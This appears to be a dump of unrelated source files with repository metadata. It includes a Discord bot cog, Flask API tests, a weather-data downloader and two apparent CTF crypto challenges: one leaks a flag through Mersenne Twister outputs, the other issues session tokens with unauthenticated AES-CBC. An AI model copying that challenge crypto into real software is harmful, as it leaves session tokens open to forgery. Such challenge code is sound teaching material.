lines = plt.plot(x, y, x, ym1, x, ym2, 'o')
plt.setp(lines[0], linewidth=4)
plt.setp(lines[1], linewidth=2)
plt.setp(lines[2], markersize=10)
plt.legend(('No mask', 'Masked if > 0.5', 'Masked if < -0.5'),
loc='upper right')
plt.title('Masked line demo')
plt.show()
| 26.586207 | 125 | 0.674449 |
c64083cdbb6bc51279e8d61f14f8bb6353a1ec31
| 8,600 |
py
|
Python
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | 1 |
2021-09-03T15:14:40.000Z
|
2021-09-03T15:14:40.000Z
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | 1 |
2022-01-02T15:18:08.000Z
|
2022-02-14T12:46:20.000Z
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | null | null | null |
import discord, asyncio
from core.database import Servers
from core.embeds import Embeds
from core.files import Data
commands = discord.ext.commands
class BumpSetup(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.config = Data("config").yaml_read()
self.settings = Data("settings").json_read()
global setting_up
setting_up = []
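        # Guilds that currently have a setup/delete flow in progress; the
        # command checks reject concurrent invocations for these guilds.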
@commands.Cog.listener('on_guild_remove')
async def remove_guild(self, guild):
Servers(guild.id).delete()
@commands.guild_only()
@commands.has_permissions(manage_guild=True)
@commands.check(lambda ctx: ctx.guild not in setting_up)
@commands.command()
async def setup(self, ctx):
guild = ctx.guild
prefix = Servers(guild.id).getPrefix() if Servers(guild.id).hasPrefix else self.config["prefix"]
if Servers(guild.id).get():
            return await ctx.send(embed=Embeds(f"Der Server ist schon aufgesetzt, benutze `{prefix}delete`, um das Setup erneut zu starten!").error())
embed = discord.Embed(
title="🔄 Setting Up...",
color=discord.Color.green()
)
embed.set_author(name=str(ctx.author), icon_url=ctx.author.avatar_url_as(static_format="png"))
        embed.description = "Gib deine Server-Beschreibung ein, sie muss zwischen 10 und 2048 Zeichen haben!"
await ctx.send(embed=embed)
try:
description = (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content
if len(description) > 2048:
return await ctx.send(embed=Embeds("Setup abgebrochen deine Beschreibung ist zu lang!").error())
elif len(description) < 10:
return await ctx.send(embed=Embeds("Setup abgebrochen deine Beschreibung ist zu kurz!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
        embed.description = "Gib den Channel an, in dem der Invite sein soll!"
await ctx.send(embed=embed)
try:
invite = await commands.TextChannelConverter().convert(ctx, (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content)
if not invite.permissions_for(ctx.me).create_instant_invite:
                return await ctx.send(embed=Embeds("Setup abgebrochen, ich habe keine Permission, einen Invite zu erstellen!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen!").error())
except commands.ChannelNotFound:
return await ctx.send(embed=Embeds("Setup abgebrochen, channel wurde nicht gefunden!").error())
        embed.description = "Gib den Channel an, in dem die Bumps gesendet werden sollen; der Bot braucht Manage-Webhooks-Permissions!"
await ctx.send(embed=embed)
try:
listing = await commands.TextChannelConverter().convert(ctx, (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content)
if not listing.permissions_for(ctx.me).manage_webhooks:
return await ctx.send(embed=Embeds("Setup abgebrochen mir fehlt die Permission Manage Webhooks!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
except commands.ChannelNotFound:
return await ctx.send(embed=Embeds("Setup abgebrochen, Channel nicht gefunden!").error())
embed.description = "Gebe eine Farbe für deinen Bump an: `HEX` !"
await ctx.send(embed=embed)
try:
color = int((await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content.replace("#", ""), 16)
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
except ValueError:
return await ctx.send(embed=Embeds("Setup abgebrochen, die Farbe gibt es nicht!").error())
webhook = await listing.create_webhook(name=self.config['bot_name'])
Servers(ctx.guild.id).add(webhook=webhook.id, invite=invite.id, color=color, description=description, icon_url=str(ctx.guild.icon_url_as(static_format="png")), server_name=ctx.guild.name)
return await ctx.send(embed=discord.Embed(
title="👌 Setup Beendet",
description="Dein Server wurde in die Datenbenk eingetragen.",
color=discord.Color.green()
))
@commands.guild_only()
@commands.has_permissions(manage_guild=True)
@commands.check(lambda ctx: ctx.guild not in setting_up)
@commands.command()
async def delete(self, ctx):
if not Servers(ctx.guild.id).get():
return await ctx.send(embed=Embeds("Der Server hat keine Daten in unserer Datenbank!").error())
confirmation_message = await ctx.send(embed=discord.Embed(
title=" ⚠️Willst du das wirklich machen?⚠️",
description=f"**{ctx.author}**,Du willst dein Server aus der Datenbank löschen,bist du dir Sicher.",
color=discord.Color.orange()
))
emojis = ["✅", "❎"]
for emoji in emojis: await confirmation_message.add_reaction(emoji)
try:
reaction, user = await self.bot.wait_for(
'reaction_add',
timeout=120,
check=lambda r, u: r.emoji in emojis and r.message.id == confirmation_message.id and u.id == ctx.author.id
)
except asyncio.TimeoutError:
await ctx.send(embed=Embeds("Server wurde nicht gelöscht, da die Zeit abgelaufen ist!").error())
return await confirmation_message.delete()
if reaction.emoji == emojis[1]:
return await ctx.send(embed=Embeds("Serverlöschung gestoppt.").error())
db_entry = Servers(ctx.guild.id)
cache_data = db_entry.get()
db_entry.delete()
setting_up.remove(ctx.guild)
del_message = await ctx.send(embed=discord.Embed(
title="🗑️ Server gelöscht",
description="Der Server wurde aus der Datenbank gelöscht, Du hast eine Minute Zeit um das rückgängig zu machen.",
color=discord.Color.green()
))
await del_message.add_reaction("♻️")
try:
await self.bot.wait_for(
'reaction_add',
timeout=60,
check=lambda r,u: r.emoji == "♻️" and r.message.id == del_message.id and u.id == ctx.author.id
)
except asyncio.TimeoutError:
try:
wh = await self.bot.fetch_webhook(cache_data['webhook'])
await wh.delete()
except:
pass
return await del_message.remove_reaction("♻️", self.bot.user)
if Servers(ctx.guild.id).get():
try:
wh = await self.bot.fetch_webhook(cache_data['webhook'])
await wh.delete()
except:
pass
return await ctx.send(embed=discord.Embed(
title="❎ Restoren des Servers nicht möglich",
description="Du musst deinen Server nochmal setupen mit =setup",
color=discord.Color.red()
))
Servers(ctx.guild.id).add(**cache_data)
return await ctx.send(embed=discord.Embed(
title="♻️ Server Restored",
description="Dein Server wurde wieder hergestellt.",
color=discord.Color.green()
))
@setup.before_invoke
@delete.before_invoke
async def add_to_setting_up(self, ctx):
setting_up.append(ctx.guild)
@setup.after_invoke
@delete.after_invoke
async def remove_from_setting_up(self, ctx):
try:
setting_up.remove(ctx.guild)
except: pass
def setup(bot):
bot.add_cog(BumpSetup(bot))
| 41.95122 | 195 | 0.614767 |
0680715fb87395cc84968553ece1b783529d1128
| 136 |
py
|
Python
|
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | null | null | null |
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | 9 |
2017-06-15T10:24:09.000Z
|
2018-08-01T21:07:25.000Z
|
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.apps import AppConfig
class kohrsupplyConfig(AppConfig):
name = 'kohrsupply'
| 17 | 39 | 0.801471 |
00375be90a613ab5cd6043f22cb4deaf1382f7a4
| 346 |
py
|
Python
|
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | 4 |
2020-12-28T23:43:35.000Z
|
2022-01-01T18:34:18.000Z
|
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | null | null | null |
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | 9 |
2020-09-26T19:29:28.000Z
|
2022-02-07T06:41:00.000Z
|
from my_package.calculations import addition
from my_package.calculations import division
from my_package.calculations import multiplication
from my_package.calculations import subtraction
from my_package.printing import hello_world
hello_world()
print(addition(1, 2))
print(subtraction(1, 2))
print(multiplication(1, 2))
print(division(1, 2))
| 26.615385 | 50 | 0.83237 |
cc4035011dbf1192d4cd94b47116fc9d567354e8
| 4,748 |
py
|
Python
|
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
import pytest
import json
from server.server import app, db
import re
from server.databaseHandler import createDBAndAdminUser,login
userCounter = 0
@pytest.fixture
def client():
'''
This method is like the @setup Method. It gets called before every test.
:return: Returns a REST interface which is used by the test methods.
'''
print('\n----- CREATE FLASK APPLICATION\n')
test_client = app.test_client()
app.secret_key = "super secret key"
createDBAndAdminUser()
global userCounter
userCounter = 0
yield test_client
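    # Everything after the yield runs as teardown once the test has finished.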
db.drop_all()
def countUser(client):
'''
    This Method counts the users in the database and adds the count to the global userCounter used by the test methods.
:param client: is the Flask test_client.
'''
result = login(client,"get",url='/user')
json_data = json.loads(result.data)
global userCounter
for item in json_data:
userCounter += 1
def test_noAuth(client):
response = client.get('/user')
assert (response.status_code == 401)
def test_digest_auth_prompt(client):
response = client.get('/user')
assert(response.status_code == 401)
assert('WWW-Authenticate' in response.headers)
assert(re.match(r'^Digest realm="Authentication Required",'
r'nonce="[0-9a-f]+",opaque="[0-9a-f]+"$',
response.headers['WWW-Authenticate']))
def test_post_user(client):
'''
This Method is testing the post method.
:param client: is the Flask test_client
'''
print('\n----- TESTING POST USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
response = login(client, "post", json_dict)
assert response.status_code == 200
def test_post_user_notAllArgs(client):
'''
This Method tests to post a new user without giving every arg.
:param client: Is the Flask test_client.
'''
print('\n----- TESTING POST USER WITH NOT ALL ARGS GIVEN\n')
json_dict = {"username": "testuser", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
    assert response.status_code == 500
def test_post_user_userExists(client):
'''
    This Method tests posting a user whose data already exists in the database.
:param client: Is the Flask test_client.
'''
print('\n----- TESTING POST USER with existing data\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
    assert response.status_code != 200  # posting a duplicate user must not succeed
def test_get_user(client):
'''
This Method tests the GET Method.
:param client: Is the Flask test_client.
'''
print('\n--- TESTING GET USER\n')
countUser(client)
url = '/user/' + str(userCounter)
response = login(client, "get", url=url)
json_data = json.loads(response.data)
assert 'id' in json_data
assert '[email protected]' in json_data['email']
assert 'admin' in json_data['username']
def test_put_user(client):
'''
This Method updates a user and tests if the updates took place.
:param client: Is the Flask test_client
'''
print('\n--- TESTING PUT USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
login(client, "post", json_dict)
countUser(client)
url = '/user/' + str(userCounter)
json_dict2 = {"email": "Neue Email", "username": "testuser"}
response = login(client, "put", url=url, json_dict=json_dict2)
assert response.status_code == 200
response = login(client, "get", url=url)
json_data = json.loads(response.data)
assert 'Neue Email' in json_data['email']
def test_delete_user(client):
'''
This Methods deletes the last added user and tests if it is still there.
:param client: is the Flask test_client.
'''
print('\n--- TESTING DELETE USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
login(client, "post", json_dict)
countUser(client)
url = '/user/' + str(userCounter)
response = login(client,"delete",url=url)
assert response.status_code == 200
#Test if user is still in the db
response = login(client,"get")
json_data = json.loads(response.data)
for user in json_data:
assert 'testuser' not in user['username']
| 27.766082 | 127 | 0.648062 |
aead4bc57a94d6059889b3eb06930efa48c66de6
| 429 |
py
|
Python
|
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
from secret import flag
import os
import random
state_len = 624*4
right_pad = random.randint(0,state_len-len(flag))
left_pad = state_len-len(flag)-right_pad
state_bytes = os.urandom(left_pad)+flag+os.urandom(right_pad)
state = tuple( int.from_bytes(state_bytes[i:i+4],'big') for i in range(0,state_len,4) )
random.setstate((3,state+(624,),None))
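# setstate() takes (version, internal_state, gauss_next); the internal state
# is the 624 32-bit Mersenne Twister words plus a position index. Index 624
# forces a twist before the first output, so the 624 outputs below are
# derived from the state that embeds the flag.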
outputs = [random.getrandbits(32) for i in range(624)]
print(*outputs,sep='\n')
| 28.6 | 87 | 0.745921 |
aec17c9e87a24b9ff7c00abc71f18927344b7a30
| 2,377 |
pyde
|
Python
|
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# Hero 01
from sprites3 import Hero, Orc, Obstacle
tilesize = 32
terrain = [[0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,7],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,7],
[0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,7],
[0,0,0,0,0,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,6],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,6,0],
[0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,6,6,6,0,0],
[6,9,0,9,9,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0],
[9,6,9,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
hero = Hero(16*tilesize, 0)
orc = Orc(4*tilesize, 0)
obstacles = []
def setup():
global bg
bg = loadImage("terrain.png")
loadObstaclesData()
frameRate(30)
size(640, 320)
hero.loadPics()
orc.loadPics()
hero.dx = 2
hero.dy = 2
orc.dx = 2
orc.dy = 2
def draw():
background(bg)
hero.move()
for i in range(len(obstacles)):
if hero.checkCollision(obstacles[i]):
if hero.dir == 0:
hero.x -= hero.dx
elif hero.dir == 1:
hero.y -= hero.dy
elif hero.dir == 2:
hero.x += hero.dx
elif hero.dir == 3:
hero.y += hero.dy
hero.image1 = hero.image2
hero.display()
orc.move()
for i in range(len(obstacles)):
        if orc.checkCollision(obstacles[i]):
            # push the orc back out of the obstacle and pick a new direction
            if orc.dir == 0:
                orc.x -= orc.dx
                orc.dir = int(random(4))
            elif orc.dir == 1:
                orc.y -= orc.dy
                orc.dir = int(random(4))
            elif orc.dir == 2:
                orc.x += orc.dx
                orc.dir = int(random(4))
            elif orc.dir == 3:
                orc.y += orc.dy
                orc.dir = int(random(4))
orc.image1 = orc.image2
orc.display()
def keyPressed():
if keyPressed and key == CODED:
if keyCode == RIGHT:
hero.dir = 0
elif keyCode == DOWN:
hero.dir = 1
elif keyCode == LEFT:
hero.dir = 2
elif keyCode == UP:
hero.dir = 3
def loadObstaclesData():
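    # Tile codes above 5 (6-9 in the terrain map) are solid; each one becomes
    # an Obstacle positioned in pixels.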
for y in range(10):
for x in range(20):
if terrain[y][x] > 5:
obstacles.append(Obstacle(x*tilesize, y*tilesize))
| 29.345679 | 66 | 0.454775 |
c9fb0f8ebbd0b19751210ef3bd1d1790555c3ab4
| 7,877 |
py
|
Python
|
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | 1 |
2021-06-01T10:30:00.000Z
|
2021-06-01T10:30:00.000Z
|
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | null | null | null |
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# DWD_hist_weather.py
#
# (c) 2021 Holger Leerhoff
#
# This module imports data from the extensive open-data offering of the
# German weather service (Deutscher Wetterdienst, DWD) into a pandas
# DataFrame.
#
# Regionality
#
# Weather stations are selected by federal state. Based on the chosen state,
# all weather stations located there are determined; their historical and
# recent data are downloaded, extracted and (here using temperature as the
# example) loaded into a DataFrame, ready for further analysis.
import numpy as np
import pandas as pd
from bs4 import BeautifulSoup
import requests
from urllib.request import urlopen
from io import BytesIO
from zipfile import ZipFile
import fnmatch
def tageswerte_land(auswertungsland, still=False, protokoll=False):
"""
Parameters
----------
    auswertungsland : Name of the federal state (required)
    still: suppress progress indicators (optional, default: False)
protokoll: write wetterdaten.csv.gz (optional, default: False)
Returns
-------
Pandas DataFrame with the state's daily average measured values:
- TempMean, HumidityMean, TempMax, TempMin, SunshineDuration
"""
DWD_PFAD = 'https://opendata.dwd.de/climate_environment/CDC/' \
'observations_germany/climate/daily/kl/'
assert auswertungsland in ['Baden-Württemberg', 'Bayern', 'Berlin', 'Brandenburg',
'Bremen', 'Hamburg', 'Hessen', 'Mecklenburg-Vorpommern',
'Niedersachsen', 'Nordrhein-Westfalen', 'Rheinland-Pfalz',
'Saarland', 'Sachsen', 'Sachsen-Anhalt',
                               'Schleswig-Holstein', 'Thüringen'], 'Please pass the name of a' \
                               ' German federal state as parameter.'
    # Load the weather stations from the DWD open-data server. Info, dataset
    # description etc. here: https://opendata.dwd.de/README.txt
url = DWD_PFAD + 'historical/KL_Tageswerte_Beschreibung_Stationen.txt'
stationen = pd.read_fwf(url,
encoding='ISO-8859-1',
header=None,
skiprows=[0, 1],
names=['Stations_id', 'von_datum', 'bis_datum',
'Stationshoehe', 'geoBreite', 'geoLaenge',
'Stationsname', 'Bundesland'])
    # Extract all station IDs per federal state from the dataset and store them
    # as separate lists in a dictionary keyed by the state name.
stationen_ids = {}
for land in stationen['Bundesland'].unique():
stationen_ids[land] = stationen[stationen['Bundesland']
== land]['Stations_id'].tolist()
    # Assemble the URLs of the stations' ZIP archives on the DWD open-data
    # server: fetch the HTML page, parse it with BeautifulSoup and collect the
    # matching file names keyed by station ID.
stationen_dateinamen = {}
page = requests.get(DWD_PFAD+'historical').text
soup = BeautifulSoup(page, 'html.parser')
for node in soup.find_all('a'):
if node.get('href').startswith('tageswerte_KL_'):
stationen_dateinamen[int(node.text[14:19])] = node.text
    # Pull the weather data of the selected stations (as ZIP archives) from the
    # DWD open-data server, locate the actual data file inside each archive and
    # read its contents.
    # For every station, also look for a file with recent weather data and read
    # its contents.
    # Error handling covers stations without freely available / recent data.
    # The following measurements are read here:
    # - daily mean temperature in °C (TMK)
    # - daily mean relative humidity in % (UPM)
    # - daily maximum temperature at 2 m height in °C (TXK)
    # - daily minimum temperature at 2 m height in °C (TNK)
    # - daily sunshine duration in h (SDK)
    # - daily mean wind speed in m/s (FM)
    # The dataset contains further measurements as well.
wetter = pd.DataFrame()
for station in stationen_ids[auswertungsland]:
for typ in ['historical', 'recent']:
try:
if typ == 'historical':
url = DWD_PFAD+'historical/'+stationen_dateinamen[station]
else:
url = DWD_PFAD+'recent/tageswerte_KL_' + \
str(station).zfill(5)+'_akt.zip'
gezippte_dateien = ZipFile(BytesIO(urlopen(url).read()))
csv_dateiname = (fnmatch.filter(gezippte_dateien.namelist(),
'produkt*.txt'))
csv_daten = gezippte_dateien.open(*csv_dateiname)
wetter = wetter.append(pd.read_csv(csv_daten,
sep=';',
usecols=['STATIONS_ID',
'MESS_DATUM',
' TMK',
' UPM',
' TXK',
' TNK',
' SDK',
' FM'],
parse_dates=['MESS_DATUM']))
if not still:
print('.', end='')
except KeyError: # für die Wetterstation liegen keine Daten vor
if not still:
print('-', end='')
except IOError: # für die Wetterstation liegen keine akt. Daten vor
if not still:
print('-', end='')
    # Replace missing values (-999.0) with NaN.
wetter = (wetter.rename(columns={'STATIONS_ID': 'Station',
'MESS_DATUM': 'Datum',
' TMK': 'TempMean',
' UPM': 'HumidityMean',
' TXK': 'TempMax',
' TNK': 'TempMin',
' SDK': 'SunshineDuration',
' FM': 'Windspeed'})
.replace(-999.0, np.nan))
    # Log: optionally save the large DataFrame as a compressed csv
if protokoll:
wetter.to_csv('./wetterprotokoll.csv.gz', index=False, compression='gzip')
    # Build regional daily means from the station data
tageswerte = wetter[['Datum', 'TempMean', 'HumidityMean', 'TempMax', 'TempMin',
'SunshineDuration', 'Windspeed']].groupby('Datum').mean()
tageswerte['Jahr'] = tageswerte.index.year
tageswerte['Monat'] = tageswerte.index.month
tageswerte['Tag_des_Jahres'] = tageswerte.index.dayofyear
return tageswerte
def tagestemp_land(auswertungsland, still=False): # for backwards compatibility
"""
Parameters
----------
land : Name of federal state (required)
    still: suppress progress indicators (optional, default: False)
    Returns
    -------
    Pandas DataFrame with the state's daily average temperatures
    """
    tageswerte = tageswerte_land(auswertungsland, still)
tageswerte = tageswerte[['TempMean', 'Jahr', 'Monat', 'Tag_des_Jahres']]
tageswerte = tageswerte.rename(columns={'TempMean': 'Temp'})
return tageswerte
# when invoked directly with a state as parameter, print annual mean temperatures
if __name__ == "__main__":
import sys
tageswerte = tageswerte_land(sys.argv[1])
    print(f'\nAnnual mean temperatures for {sys.argv[1]}.')
print(tageswerte.groupby('Jahr')['TempMean'].mean())
| 48.325153 | 89 | 0.573949 |
4ea3a0dcd2c25937127edf1829caf1b7e18a4575
| 139 |
py
|
Python
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | 1 |
2022-02-02T21:56:08.000Z
|
2022-02-02T21:56:08.000Z
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | 27 |
2020-06-27T23:25:59.000Z
|
2022-02-27T20:40:56.000Z
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | null | null | null |
number = input("Type a number: ")
try:
number = float(number)
print("The number is: ", number)
except ValueError:
    print("Invalid number")
| 19.857143 | 36 | 0.633094 |
1109ae93791128000604ddf124ebeadf105e2846
| 3,562 |
py
|
Python
|
skimind/kernel/pdfManag/extract.py
|
NathBangwa/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 1 |
2020-11-13T18:30:47.000Z
|
2020-11-13T18:30:47.000Z
|
skimind/kernel/pdfManag/extract.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 5 |
2020-11-13T18:16:48.000Z
|
2021-09-08T01:04:59.000Z
|
skimind/kernel/pdfManag/extract.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | null | null | null |
# excel reader
import xlrd
# system tools
import os
# datetime
import pandas as pd
# regular expression
import re
# copy
import copy
def extract_metadatas(metadatas, is_betfile=True):
"""
suppression du caractere versus
remplacement des donnees vides (-)
transformation des cotes en float
"""
def serialize_data(data, isclass=False):
# lowercase
data = str(data).lower()
# replace comma by fullstop
data = data.replace(",", ".")
        # replace -, x with 0
try:
if is_betfile:
data = float(data)
else:
data = int(data)
        except (TypeError, ValueError):
            data = 0
finally:
if isclass:
data = int(data)
return data
def move_datas_bet(cotes):
# copy
new_cotes = copy.deepcopy(cotes)
        # --> indexes of the odds to move
        index_to_move = [1, 4, 7, 10, 13, 22]
        # --> rearrange new_cotes
for index in index_to_move:
new_cotes[index], new_cotes[index + 1] = new_cotes[index + 1], new_cotes[index]
return new_cotes
new_metadatas = copy.deepcopy(metadatas)
for index in range(len(new_metadatas)):
# idmatch
idmatch = new_metadatas[index][0]
idmatch = int(idmatch)
new_metadatas[index][0] = idmatch
# classement_A classement_B
class_a = new_metadatas[index][4]
class_b = new_metadatas[index][6]
new_metadatas[index][4] = serialize_data(class_a, isclass=True)
new_metadatas[index][6] = serialize_data(class_b, isclass=True)
# cote ou resultat
datas = new_metadatas[index][8:]
datas = map(serialize_data, datas)
datas = list(datas)
if is_betfile:
datas = move_datas_bet(datas)
new_metadatas[index][8:] = datas
        # delete the versus symbol
del new_metadatas[index][5]
return new_metadatas
def extract_datas(filename:str):
def is_matchs_datas(tablist):
"""
Verifie si une liste contient les donnees de pari
"""
try:
date = tablist[1].value
            date_list = re.findall(r"\d\d[-/]\d\d[-/]\d{2,4}", date)
            if not date_list:
                raise ValueError("the row does not contain any date")
except:
return False
return True
def get_values(tablist):
datas = map(lambda data: data.value, tablist)
datas = list(datas)
return datas
#
workbook = xlrd.open_workbook(filename)
# sheets
sheets = workbook.sheets()
metadatas = list()
for sheet in sheets:
for row in sheet.get_rows():
if is_matchs_datas(row):
                # serialize the values
                row = get_values(row)
                # append
metadatas.append(row)
return metadatas
def pdf_process(filename:str, is_betfile=True):
metadata = extract_datas(filename)
metadata = extract_metadatas(metadata, is_betfile=is_betfile)
print(metadata[0:2])
# test
filename = "C:\\Users\\RMB PC\\Downloads\\long.xlsx"
pdf_process(filename)
| 23.281046 | 95 | 0.52667 |
feca8821c2a71890d348d55d6596060b0e8c15af
| 662 |
py
|
Python
|
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import base64
import json
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
class Manager:
BLOCK_SIZE = AES.block_size
def __init__(self, key):
self.key = key
def pack(self, session):
cipher = AES.new(self.key, AES.MODE_CBC)
iv = cipher.iv
dec = json.dumps(session).encode()
enc = cipher.encrypt(pad(dec, self.BLOCK_SIZE))
raw = iv + enc
return base64.b64encode(raw)
def unpack(self, token):
raw = base64.b64decode(token)
iv = raw[:self.BLOCK_SIZE]
enc = raw[self.BLOCK_SIZE:]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
dec = unpad(cipher.decrypt(enc), self.BLOCK_SIZE)
return json.loads(dec.decode())
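# Hedged usage sketch (illustrative, not part of the original challenge file);
# assumes a throwaway random 16-byte key just to show the pack/unpack round trip.
if __name__ == "__main__":
    import os
    manager = Manager(os.urandom(16))
    token = manager.pack({"user": "sheep", "admin": False})
    assert manager.unpack(token) == {"user": "sheep", "admin": False}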
| 23.642857 | 51 | 0.70997 |
3a2ac405532f3af64dc27adf252a53eab657c4d4
| 3,459 |
py
|
Python
|
pyramid-creator/app/utils/slide_utils.py
|
jinnn-dev/patholearn
|
